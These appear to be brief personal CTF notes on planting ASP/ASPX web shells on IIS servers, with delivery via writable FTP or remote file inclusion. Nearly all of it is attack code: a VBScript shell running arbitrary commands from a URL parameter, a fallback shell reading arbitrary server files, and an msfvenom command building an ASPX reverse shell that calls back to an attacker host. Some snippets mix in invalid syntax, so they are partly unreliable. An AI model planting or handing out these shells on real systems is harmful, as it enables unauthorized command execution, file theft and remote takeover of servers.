Notes on asp/aspx shells on IIS: found a great pdf regarding this topic by Joseph Giron.
In the document, it details some old school methods of 'interacting' with server side process. We'll need a way to insert the asp code somehow, usually in CTFs we can do this via R/W FTP access or RFI.
- ASP shell with VB by using
Wscript.shellto execute commands given from url input
-
example:
<% Set command = Request.QueryString("cmd") if command == "" then Response.Write("No Command Entered!"); else Set objWShell = CreateObject("WScript.Shell") Set objCmd = objWShell.Exec(command) strPResult = objCmd.StdOut.Readall() set objCmd = nothing: Set objWShell = nothing Response.Write(strPResult) end if %>
-
If
Wscript.shellis blocked, try usingFileSystemObjectto read files from url input:<% Response.Write("Full directory path is: <br /><strong>") Response.Write(Server.MapPath(".")) Response.Write("</strong><br />") ourfile = Request.QueryString("file") if ourfile == "" then Response.Write("No file specified!") else SUB ReadDisplayFile(FileToRead) ourfile=server.mappath(FileToRead) Set fs = CreateObject("Scripting.FileSystemObject") Set thisfile = fs.OpenTextFile(ourfile, 1, False) tempSTR=thisfile.readall response.write(tempSTR) thisfile.Close set thisfile=nothing set fs=nothing end sub end if %>
Other option is just generate shellcode from
msfvenom -p windows/shell_reverse_tcp -f aspx --smallest lhost=x.x.x.x lport=4141 -o iishelp.aspx